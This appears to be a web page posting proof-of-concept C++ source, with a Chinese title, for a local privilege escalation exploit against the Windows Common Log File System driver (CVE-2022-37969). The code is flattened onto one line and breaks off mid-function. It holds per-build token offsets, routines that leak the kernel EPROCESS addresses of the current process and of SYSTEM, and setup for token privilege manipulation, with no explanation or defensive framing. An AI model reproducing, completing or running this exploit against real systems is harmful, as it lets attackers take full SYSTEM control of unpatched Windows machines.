CVE-2022-37969 Windows 本地权限提升 PoC

// // Understanding the CVE-2022-37969 Windows Common Log File System Driver Local Privilege Escalation.  // Authors: Rainbow www.chwm.vip // #pragma warning (disable : 4005) #include <stdio.h> #include <iostream> #include <windows.h> #include <clfsw32.h> #include <ntstatus.h> #include <processthreadsapi.h> #include <tlhelp32.h> #include "ntos.h" #include "crc32.h" #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "Clfsw32.lib") /* Windows Server 2016 Standard ------> Windows Server 2019 Standard ------> 17763 token offset: 0x4b8 Windows Server 2022 Standard ------> 20348 token offset: 0x4b8 Windows 10 Pro Version 21H1 -------> 19041 19043 offset: 0x4b8 Windows 10 Pro Version 21H2 -------> 19041 offset: 0x4b8 Windows 11 Pro Version 21H2 -------> 22000 token offset: 0x4b8 */ // // NT syscalls // #define SystemModuleInformation 0xb #define SystemHandleInformation 0x10 typedef struct _SYSTEM_BIGPOOL_ENTRY { union { PVOID VirtualAddress; ULONG_PTR NonPaged : 1; }; SIZE_T SizeInBytes; union { UCHAR Tag[4]; ULONG TagUlong; }; } SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY; typedef struct _SYSTEM_BIGPOOL_INFORMATION { ULONG Count; SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; } SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION; typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T); _NtQuerySystemInformation fnNtQuerySystemInformation = NULL; _NtWriteVirtualMemory fnNtWriteVirtualMemory = NULL; // // Leaked addresses // DWORD64 g_EProcessAddress = 0; DWORD64 g_EThreadAddress = 0; DWORD64 g_TokenAddress, my_pidEprocess = 0; // // Version dependent offsets // #define OFFSET_OF_PREVIOUS_MODE 0x232 #define OFFSET_OF_WIN32PROCESS 0x3b0 #define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40 #define OFFSET_OF_DCOMPOSITIONPROCESS 0x100 // // CInteractionTrackerMarshaler object offsets // #define OFFSET_OF_FUNCTION 0x50 #define OBJECT_SIZE 0x1a0 typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG); // Global Variables IO_STATUS_BLOCK v30; IO_STATUS_BLOCK v31; UINT64 offset_SeSetAccess = 0; func* _NtFsControlFile; UINT64 fnSeSetAccessStateGenericMapping = 0; UINT64 offset_ClfsEarlier = 0; UINT64 fnClfsEarlierLsn = 0; CHAR clfs_path[] = { "\\SystemRoot\\System32\\drivers\\CLFS.SYS" }; FARPROC v22b = NULL; UINT64 ntos_kernelBase = NULL; UINT64 clfs_kernelBase = NULL; WCHAR* stored_env_xfname = { 0 }; UINT64 v14 = 0; UINT64 v15 = 0; WCHAR* stored_env_containerfname = { 0 }; WCHAR* stored_env_containerfname2 = { 0 }; WCHAR* stored_env_containerfname3 = { 0 }; DWORD* hReadPipe[2] = { 0 }; UINT64 System_token_value = 0; int numread; #define NUMELEM 0x7a00 char buff[0x7a00]; INT64 v22 = 0; INT64 v23 = 0; INT64 v26 = 0; INT64 v24 = 0; INT64 v31b = 0; INT64 v32 = 0; UINT num_of_CLFS = 0; PUINT p_num_of_CLFS = &num_of_CLFS; // number of CLFS tags CHAR tag[] = { "Clfs" }; PUINT64 v10 = 0; // Offset of last field virtual address int v9 = 0; // stores the amount of bigpool clfs tags WCHAR* stored_env_fname; DWORD _pid = 0; DWORD pid_to_find = 0; int token_offset = 0; LONGLONG token_value = 0; int winversion = 0; WCHAR* stored_env_open; WCHAR* foldr = nullptr; DWORDLONG system_EPROCESS = 0; PUINT64 kernelAddrArray = 0; HANDLE hProcess = NULL; HANDLE hThread = NULL; HANDLE hToken = NULL; HMODULE user32 = NULL; int flag = 0; int flag2 = 0; UINT64 dest2 = 0; UINT64 dest3 = 0; UINT64 value2 = 0; UINT64* value3 = 0; UINT64 next_token; // Get OS version to get TOKEN offsets int getOSversion() { char buff[100]; HKEY hKey; DWORD cType; wchar_t lpData[1024] = { 0 }; DWORD buffersize = sizeof(lpData); int tokenOffset = 0; memset(buff, 0, sizeof(buff)); // clear buffer if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"), NULL, KEY_READ, &hKey) == ERROR_SUCCESS) { printf("[+] Registry key Opened successfully\n"); } else { printf("[!] Failed to open reg key: %s\n", GetLastError()); exit(1); } RegQueryValueExW(hKey, TEXT(L"CurrentBuild"), NULL, &cType, (LPBYTE)lpData, &buffersize); RegCloseKey(hKey); // convert unicode to ansi WideCharToMultiByte(CP_UTF8, 0, lpData, -1, (LPSTR)buff, 0x80, 0, 0); // convert string to int winversion = atoi(buff); wprintf(L"[+] Windows Build Number: %i\n", winversion); // check if versions are supported if (winversion >= 17763 && winversion <= 22000) { token_offset = 0x4b8; // store the token offset } else { printf("[!] Version %d not supported. Exiting...\n", winversion); } return 0; } SIZE_T GetObjectKernelAddress(HANDLE Object) { PSYSTEM_HANDLE_INFORMATION_EX handleInfo = NULL; ULONG handleInfoSize = 0x1000; ULONG retLength; NTSTATUS status; SIZE_T kernelAddress = 0; BOOL bFind = FALSE; while (TRUE) { handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize); status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength); if (status == 0xC0000004 || NT_SUCCESS(status)) // STATUS_INFO_LENGTH_MISMATCH { LocalFree(handleInfo); handleInfoSize = retLength + 0x100; handleInfo = (PSYSTEM_HANDLE_INFORMATION_EX)LocalAlloc(LPTR, handleInfoSize); status = fnNtQuerySystemInformation(SystemExtendedHandleInformation, handleInfo, handleInfoSize, &retLength); if (NT_SUCCESS(status)) { for (ULONG i = 0; i < handleInfo->NumberOfHandles; i++) { if ((USHORT)Object == 0x4) { if (0x4 == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue) { kernelAddress = (SIZE_T)handleInfo->Handles[i].Object; bFind = TRUE; break; } } else { if (GetCurrentProcessId() == (DWORD)handleInfo->Handles[i].UniqueProcessId && (SIZE_T)Object == (SIZE_T)handleInfo->Handles[i].HandleValue) { kernelAddress = (SIZE_T)handleInfo->Handles[i].Object; bFind = TRUE; break; } } } } } if (handleInfo) LocalFree(handleInfo); if (bFind) break; } return kernelAddress; } VOID InitEnvironment() { // // Resolve NT syscalls // fnNtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation"); DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &hProcess, 0, FALSE, DUPLICATE_SAME_ACCESS); // printf("[+] HPROCESS %p\n", hProcess); g_EProcessAddress = GetObjectKernelAddress(hProcess); printf("[+] MY EPROCESSS %p\n", g_EProcessAddress); system_EPROCESS = GetObjectKernelAddress((HANDLE)4); printf("[+] SYSTEM EPROCESSS %p\n", system_EPROCESS); return; } int checkAccessToken() { int v8 = 0; // todavia no se que es PHANDLE TokenHandle = 0; // int savedHprocess = 0; NTSTATUS status2; ULONG size2; NTSTATUS status3; UINT64 v11 = 0; PUINT v12 = 0; user32 = LoadLibraryW(L"user32.dll"); int currentpid = GetCurrentProcessId(); hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, 0, currentpid); if (!hProcess) { printf("[!] OpenProcess failed with error %d\n", GetLastError()); } printf("[+] hProcess: 0x%x\n", hProcess); savedHprocess = (UINT)hProcess; if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hProcess)) { printf("[!] OpenProcessToken failed with error %d\n", GetLastError()); return 0; } TokenHandle = &hProcess; printf("[+] Token handle: 0x%x\n", TokenHandle); VOID* v10 = malloc(0x20); if (!v10) { exit(1); } status2 = fnNtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandl